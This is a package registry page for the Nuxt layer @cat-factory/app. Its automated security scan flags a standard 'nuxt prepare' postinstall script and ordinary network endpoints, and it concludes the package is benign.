registry  /  @cat-factory/app  /  0.91.0

@cat-factory/app@0.91.0

Reusable Nuxt layer for the Agent Architecture Board SPA (components, stores, composables, pages). Consume it from a thin deployment app via `extends: ['@cat-factory/app']` and point it at your backend with NUXT_PUBLIC_API_BASE. See deploy/frontend for an

AI Security Review

scanned 7h ago · by lpm-firewall-ai

No confirmed malicious attack surface. The install-time hook runs Nuxt's standard prepare step for a Nuxt layer, and runtime network/credential handling is aligned with the app's documented backend workflows.

Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall or user running the SPA
Impact
No credential exfiltration, persistence, destructive behavior, or foreign AI-agent control-surface mutation identified
Mechanism
Nuxt layer configuration and browser API client
Rationale
Static inspection shows a large Nuxt SPA layer with a standard `nuxt prepare` postinstall and package-aligned client API/WebSocket code. Suspicious scanner labels are explained by normal frontend networking, auth/session handling, and user-invoked credential storage flows, with no concrete malicious chain.
Evidence
package.jsonnuxt.config.tsapp/composables/useApi.tsapp/composables/api/client.tsapp/composables/useWorkspaceStream.tsapp/stores/auth.tsapp/stores/personalSubscriptions.ts
Network endpoints5
localhost:8787github.com/settings/tokens/newgitlab.com/-/user_settings/personal_access_tokensgithub.comopenrouter.ai/keys

Decision evidence

public snapshot
AI called this Clean at 94.0% confidence as Benign with low false-positive risk.
Evidence for block
  • package.json defines postinstall: nuxt prepare
Evidence against
  • package.json has no bin and main is nuxt.config.ts for a Nuxt layer
  • nuxt.config.ts only configures Nuxt modules, i18n, CSS paths, and local default apiBase
  • No package files or binaries for preinstall/install payloads found
  • No child_process, eval/vm/Function, native addon, or filesystem write/delete primitives found in package source
  • Network code is SPA client behavior to configured cat-factory backend and user-facing OAuth/provider URLs
  • Secrets/tokens are submitted to configured backend APIs or cached locally for app workflow; no exfiltration endpoint found
Behavioral surface
Source
ChildProcessFilesystemNetworkWebSocket
Supply chain
UrlStrings
Manifest
NoLicense
scanned 195 file(s), 729 KB of source, external domains: acme.atlassian.net, example.com, github.com

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.postinstall = nuxt prepare
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = nuxt prepare
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg

Findings

1 High2 Medium4 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
LowScripts Present
LowFilesystem
LowUrl Strings
LowNo License